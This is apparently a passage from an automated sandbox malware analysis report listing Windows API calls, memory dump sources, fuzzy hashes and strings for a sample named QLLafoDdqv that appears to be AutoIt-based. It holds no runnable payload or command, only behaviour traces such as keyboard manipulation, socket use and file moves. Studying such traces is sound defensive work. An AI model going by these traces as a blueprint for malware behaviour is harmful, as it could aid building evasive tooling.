              • Instruction Fuzzy Hash: D511EB3268930ABEBB029B55AC82DAB779CDF15754F11006EF500B6183EBAD7F005368
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$LocalTime
              • String ID:
              • API String ID: 952045576-0
              • Opcode ID: e4b8644315091cb30925ac25193e0e5a6c09641022a926cd9cf728660350de70
              • Instruction ID: 953233d71ce4e2f53a67f8cd337d2b747e19839fe56707d770a17ad22f643e5b
              • Opcode Fuzzy Hash: e4b8644315091cb30925ac25193e0e5a6c09641022a926cd9cf728660350de70
              • Instruction Fuzzy Hash: 9D41B065D1021C75DB51EBB4C88A9DFB3AAAF45700F40846AF618E3162FB38E345C3E9
              APIs
              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0072682C,00000004,00000000,00000000), ref: 006EF953
              • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0072682C,00000004,00000000,00000000), ref: 0072F3D1
              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0072682C,00000004,00000000,00000000), ref: 0072F454
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ShowWindow
              • String ID:
              • API String ID: 1268545403-0
              • Opcode ID: 184ced469cb754abed815b45902d6965275a994cd9434f4cb57d7512b3803563
              • Instruction ID: 062bb6544e084ecf765a34ef74093c6220656b5b4e65e697ae4fde4e97b97505
              • Opcode Fuzzy Hash: 184ced469cb754abed815b45902d6965275a994cd9434f4cb57d7512b3803563
              • Instruction Fuzzy Hash: 8F412A302197C0BBC7399B2AD88877A7BA3AB46310F15843DF0C757663C679A881CB51
              APIs
              • DeleteObject.GDI32(00000000), ref: 00762D1B
              • GetDC.USER32(00000000), ref: 00762D23
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00762D2E
              • ReleaseDC.USER32(00000000,00000000), ref: 00762D3A
              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00762D76
              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00762D87
              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00765A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00762DC2
              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00762DE1
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
              • String ID:
              • API String ID: 3864802216-0
              • Opcode ID: 2eca772ffb24327bd19ee26f9e20a0da3daa88bd3f8c08ae26a0a95bf0d7b13c
              • Instruction ID: e59e62a9a3103ee56d2bdecc53e4818e11792e9de70ddbf83036de619ca0352e
              • Opcode Fuzzy Hash: 2eca772ffb24327bd19ee26f9e20a0da3daa88bd3f8c08ae26a0a95bf0d7b13c
              • Instruction Fuzzy Hash: F5319172201614BFEB154F50CC49FFB3BADEF09715F044055FE499A192C6B99C41CBA8
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: f8a383b01382925de88b3a6bec6e558427d412a982814cdc32fd625fbda12b39
              • Instruction ID: a3821fdb972465b6239d3089ef810889410c7ee1e6a05f45d263ee81356c419d
              • Opcode Fuzzy Hash: f8a383b01382925de88b3a6bec6e558427d412a982814cdc32fd625fbda12b39
              • Instruction Fuzzy Hash: C92195F2644A19F7F21456209D93FBA235EAF217C4F840024FE059A586FB28ED10C2E9
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: NULL Pointer assignment$Not an Object type
              • API String ID: 0-572801152
              • Opcode ID: 0206b068c864b8d7565c498dfc70fded65e408cacdcee672a5c53d027b7a3521
              • Instruction ID: c35b2652cbaf4d0dc1c6a0f84f1a077113bc1f6baf5f659c0d7a13d13f336851
              • Opcode Fuzzy Hash: 0206b068c864b8d7565c498dfc70fded65e408cacdcee672a5c53d027b7a3521
              • Instruction Fuzzy Hash: 7ED1D671A0060A9FDF10CFA8C891BEEB7B5BF48354F148069ED15AB281E7B4DD49CB90
              APIs
              • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,007117FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 007115CE
              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,007117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00711651
              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,007117FB,?,007117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007116E4
              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,007117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007116FB
                • Part of subcall function 00703820: RtlAllocateHeap.NTDLL(00000000,?,007A1444,?,006EFDF5,?,?,006DA976,00000010,007A1440,006D13FC,?,006D13C6,?,006D1129), ref: 00703852
              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,007117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00711777
              • __freea.LIBCMT ref: 007117A2
              • __freea.LIBCMT ref: 007117AE
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
              • String ID:
              • API String ID: 2829977744-0
              • Opcode ID: aab147aaecb947bb0a71e2b8c7b8681f88a8f495e400caf70a91402220c61039
              • Instruction ID: d2d2d582cccc64d57dd6f074ab0d7af80b43fb83db76196ec2c143f09337c0c8
              • Opcode Fuzzy Hash: aab147aaecb947bb0a71e2b8c7b8681f88a8f495e400caf70a91402220c61039
              • Instruction Fuzzy Hash: 6191A571E102169ADB218E78CC45AEE7BB69F49710F984659EA01EF2C1DB3DDD80C760
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Variant$ClearInit
              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
              • API String ID: 2610073882-625585964
              • Opcode ID: 21829483e59f466644a3dd483689a630f67c9efc7a972e4032658ac6fefdda41
              • Instruction ID: 4312fbc68a478a746e81e2f87e755001f8efa236fbb38830d26e8f835f4e9a57
              • Opcode Fuzzy Hash: 21829483e59f466644a3dd483689a630f67c9efc7a972e4032658ac6fefdda41
              • Instruction Fuzzy Hash: EE91A471A00219ABDF24CFA5CC44FEE7BB8EF45715F108559F905AB280D7B89989CFA0
              APIs
              • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0074125C
              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00741284
              • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 007412A8
              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007412D8
              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0074135F
              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007413C4
              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00741430
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ArraySafe$Data$Access$UnaccessVartype
              • String ID:
              • API String ID: 2550207440-0
              • Opcode ID: 6574b68f10876c1e48cb1dd31a85b3af0d2b2be96a3f76e1d94924ba27f77129
              • Instruction ID: a2317020f907cf3f7b95684436d4509797e82e16ea7a1fde8206d1cb2cd6df47
              • Opcode Fuzzy Hash: 6574b68f10876c1e48cb1dd31a85b3af0d2b2be96a3f76e1d94924ba27f77129
              • Instruction Fuzzy Hash: D391F475A00219DFDB01EF98C884BBE77B5FF44324F548029EA51EB291D7BCA981CB94
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ObjectSelect$BeginCreatePath
              • String ID:
              • API String ID: 3225163088-0
              • Opcode ID: 16c06dcb0ebd52a45c32db97c2e5b955270900eabe12ec971a41447f058989b0
              • Instruction ID: 19f580b0c245ad83f8e8d802c037397c12a892cf10e1bf49b0ef69849a9c9685
              • Opcode Fuzzy Hash: 16c06dcb0ebd52a45c32db97c2e5b955270900eabe12ec971a41447f058989b0
              • Instruction Fuzzy Hash: AA914671D01259EFCB15CFAACC84AEEBBB9FF48320F148049E516B7251D378A942CB60
              APIs
              • VariantInit.OLEAUT32(?), ref: 0075396B
              • CharUpperBuffW.USER32(?,?), ref: 00753A7A
              • _wcslen.LIBCMT ref: 00753A8A
              • VariantClear.OLEAUT32(?), ref: 00753C1F
                • Part of subcall function 00740CDF: VariantInit.OLEAUT32(00000000), ref: 00740D1F
                • Part of subcall function 00740CDF: VariantCopy.OLEAUT32(?,?), ref: 00740D28
                • Part of subcall function 00740CDF: VariantClear.OLEAUT32(?), ref: 00740D34
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
              • String ID: AUTOIT.ERROR$Incorrect Parameter format
              • API String ID: 4137639002-1221869570
              • Opcode ID: a7cbad24f4df9ae44887431e5a47fd727101c57ee977313d44e3ca3931166d54
              • Instruction ID: 5d284730851b6570eed9cfbeeef0dfbfff5b826238345ecd082dbe18555951bd
              • Opcode Fuzzy Hash: a7cbad24f4df9ae44887431e5a47fd727101c57ee977313d44e3ca3931166d54
              • Instruction Fuzzy Hash: B491AE746083059FC704DF24C48086AB7E5FF88355F04892EF8899B361DB75EE09CB92
              APIs
                • Part of subcall function 0073000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?,?,?,0073035E), ref: 0073002B
                • Part of subcall function 0073000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?,?), ref: 00730046
                • Part of subcall function 0073000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?,?), ref: 00730054
                • Part of subcall function 0073000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?), ref: 00730064
              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00754C51
              • _wcslen.LIBCMT ref: 00754D59
              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00754DCF
              • CoTaskMemFree.OLE32(?), ref: 00754DDA
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
              • String ID: NULL Pointer assignment
              • API String ID: 614568839-2785691316
              • Opcode ID: 8b1c8e9490ddc2d60c37645ed2d40e2a8827f06902028f16f7fc78fa5ab2ac12
              • Instruction ID: d78b41c4609d6784e53fbdf8502645fcea7b105df21da408e2e9b59d9c0b5954
              • Opcode Fuzzy Hash: 8b1c8e9490ddc2d60c37645ed2d40e2a8827f06902028f16f7fc78fa5ab2ac12
              • Instruction Fuzzy Hash: F1912671D0021DEFDF14DFA4D891AEEB7B9BF08314F10856AE915A7241DB749A48CFA0
              APIs
              • GetMenu.USER32(?), ref: 00762183
              • GetMenuItemCount.USER32(00000000), ref: 007621B5
              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007621DD
              • _wcslen.LIBCMT ref: 00762213
              • GetMenuItemID.USER32(?,?), ref: 0076224D
              • GetSubMenu.USER32(?,?), ref: 0076225B
                • Part of subcall function 00733A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00733A57
                • Part of subcall function 00733A3D: GetCurrentThreadId.KERNEL32 ref: 00733A5E
                • Part of subcall function 00733A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007325B3), ref: 00733A65
              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007622E3
                • Part of subcall function 0073E97B: Sleep.KERNEL32 ref: 0073E9F3
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
              • String ID:
              • API String ID: 4196846111-0
              • Opcode ID: b72c2e56e178b1f1b04402a5caa4a7c07b2482b6431fa0ce05d3c06c5d9eb137
              • Instruction ID: efdd7c7be3d1e1bba6bee4cdc73c57dc5c410da23ee467c2bff943000afaf806
              • Opcode Fuzzy Hash: b72c2e56e178b1f1b04402a5caa4a7c07b2482b6431fa0ce05d3c06c5d9eb137
              • Instruction Fuzzy Hash: 02719F35E00605AFCB54DF64C845AAEB7F6FF88320F158459E817EB352DB78AD428B90
              APIs
              • GetParent.USER32(?), ref: 0073AEF9
              • GetKeyboardState.USER32(?), ref: 0073AF0E
              • SetKeyboardState.USER32(?), ref: 0073AF6F
              • PostMessageW.USER32(?,00000101,00000010,?), ref: 0073AF9D
              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0073AFBC
              • PostMessageW.USER32(?,00000101,00000012,?), ref: 0073AFFD
              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0073B020
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessagePost$KeyboardState$Parent
              • String ID:
              • API String ID: 87235514-0
              • Opcode ID: c6b0677d31a133b0d5b3dc77feeb8cfc124040251a42e2102a794be778532668
              • Instruction ID: 16a6b96ed0d673094e6aa13202e88f6780cdc55d6e41ce18a1dd90e1f356f48a
              • Opcode Fuzzy Hash: c6b0677d31a133b0d5b3dc77feeb8cfc124040251a42e2102a794be778532668
              • Instruction Fuzzy Hash: 9E5182A06047D63DFB364234C84ABBBBEA95B06304F088589E2D9594D3D3DDEDC8D751
              APIs
              • GetParent.USER32(00000000), ref: 0073AD19
              • GetKeyboardState.USER32(?), ref: 0073AD2E
              • SetKeyboardState.USER32(?), ref: 0073AD8F
              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0073ADBB
              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0073ADD8
              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0073AE17
              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0073AE38
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessagePost$KeyboardState$Parent
              • String ID:
              • API String ID: 87235514-0
              • Opcode ID: af5ae70e6b4cd819382befcc31a51b298cd98d25e86410dd415f496c1cd5ffad
              • Instruction ID: 0447e52ab97c429342cdcf0af972e4bdb83a60a4f4b22822ef6659b011641b9f
              • Opcode Fuzzy Hash: af5ae70e6b4cd819382befcc31a51b298cd98d25e86410dd415f496c1cd5ffad
              • Instruction Fuzzy Hash: 5551D2A1A547D53DFB378334CC57B7ABEA86B46300F088588E1D54A8C3D29CEC88D762
              APIs
              • GetConsoleCP.KERNEL32(00713CD6,?,?,?,?,?,?,?,?,00705BA3,?,?,00713CD6,?,?), ref: 00705470
              • __fassign.LIBCMT ref: 007054EB
              • __fassign.LIBCMT ref: 00705506
              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00713CD6,00000005,00000000,00000000), ref: 0070552C
              • WriteFile.KERNEL32(?,00713CD6,00000000,00705BA3,00000000,?,?,?,?,?,?,?,?,?,00705BA3,?), ref: 0070554B
              • WriteFile.KERNEL32(?,?,00000001,00705BA3,00000000,?,?,?,?,?,?,?,?,?,00705BA3,?), ref: 00705584
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
              • String ID:
              • API String ID: 1324828854-0
              • Opcode ID: 72148edba0950030cd261861e038906098e80c9f425ffcf3c2ccfba6e8bb0a1d
              • Instruction ID: 93e5faad942c77b0f136366034d5f8c680b91afc7a060824a6dc58f200d304ff
              • Opcode Fuzzy Hash: 72148edba0950030cd261861e038906098e80c9f425ffcf3c2ccfba6e8bb0a1d
              • Instruction Fuzzy Hash: 3351D1B0A00648DFDB11CFA8DC45AEEBBFAEF09300F14421AF546E3291E6349A51CF64
              APIs
                • Part of subcall function 0075304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0075307A
                • Part of subcall function 0075304E: _wcslen.LIBCMT ref: 0075309B
              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00751112
              • WSAGetLastError.WSOCK32 ref: 00751121
              • WSAGetLastError.WSOCK32 ref: 007511C9
              • closesocket.WSOCK32(00000000), ref: 007511F9
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
              • String ID:
              • API String ID: 2675159561-0
              • Opcode ID: cc31d782b140be486cd05b6e0f5af7f5728540ecf732877cb0a390cfa3051aa6
              • Instruction ID: feb7fcc3ecfa8e6373ac689c27c791dc93df588096a601cf97eda304a8dc937c
              • Opcode Fuzzy Hash: cc31d782b140be486cd05b6e0f5af7f5728540ecf732877cb0a390cfa3051aa6
              • Instruction Fuzzy Hash: 73412731600608AFDB109F24C884BE9B7EAEF44326F148099FD469B291C7B8ED45CBE5
              APIs
                • Part of subcall function 0073DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0073CF22,?), ref: 0073DDFD
                • Part of subcall function 0073DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0073CF22,?), ref: 0073DE16
              • lstrcmpiW.KERNEL32(?,?), ref: 0073CF45
              • MoveFileW.KERNEL32(?,?), ref: 0073CF7F
              • _wcslen.LIBCMT ref: 0073D005
              • _wcslen.LIBCMT ref: 0073D01B
              • SHFileOperationW.SHELL32(?), ref: 0073D061
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
              • String ID: \*.*
              • API String ID: 3164238972-1173974218
              • Opcode ID: 373d02fcb99c48e86bf8d21b40618f4b2438aaaa9cbbe721821abaf7dd37aecd
              • Instruction ID: 9601f03266f9bd683ce9cf6b0f7c8f76a9196e5331cd82915d131985145e2991
